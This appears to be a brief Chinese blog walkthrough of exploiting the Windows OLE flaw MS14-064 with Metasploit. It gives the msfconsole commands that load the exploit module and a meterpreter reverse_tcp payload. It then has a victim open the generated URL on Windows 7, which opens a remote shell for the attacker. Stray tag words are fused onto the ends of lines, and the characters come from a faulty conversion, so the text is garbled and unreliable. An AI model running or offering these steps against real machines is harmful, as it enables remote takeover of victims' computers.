Microsoft Windows OLE遠程代碼執行漏洞,OLE(對象連接與嵌入)是一種容許應用程序共享數據和功能的技術,shell
遠程攻擊者利用此漏洞經過構造的網站執行任意代碼,影響Win95+IE3 – Win10+IE11全版本...windows
metasploit裏已經加入了此漏洞的利用模塊 :exploit/windows/browser/ms14_064_ole_code_executiontcp
執行命令:測試
msfconsole //啓動MSF網站
search ms14 //搜索關鍵字spa
use exploit/windows/browser/ms14_064_ole_code_execution // 加載漏洞利用模塊code
set payload windows/meterpreter/reverse_tcp //設置反彈鏈接shell對象
如圖:blog
須要注意的是箭頭標記的屬性默認爲false 須要設置爲true ,由於msf中自帶的漏洞利用exp調用的是 powershell,it
因此msf(Metasploit Framework)中的exp代碼只對安裝powershell的系統生效。win7系統安裝自帶powershell,
因此咱們這裏測試受害的機器爲windows7 32位.
按照圖中各個屬性配置好後 執行exploit便可
獲得一個URL地址,複製到受害者機器(win7)測試
當用戶點擊容許了後
能夠看見這邊反彈了一個shell,接下里咱們就能夠隨便玩了,
測試成功,結束。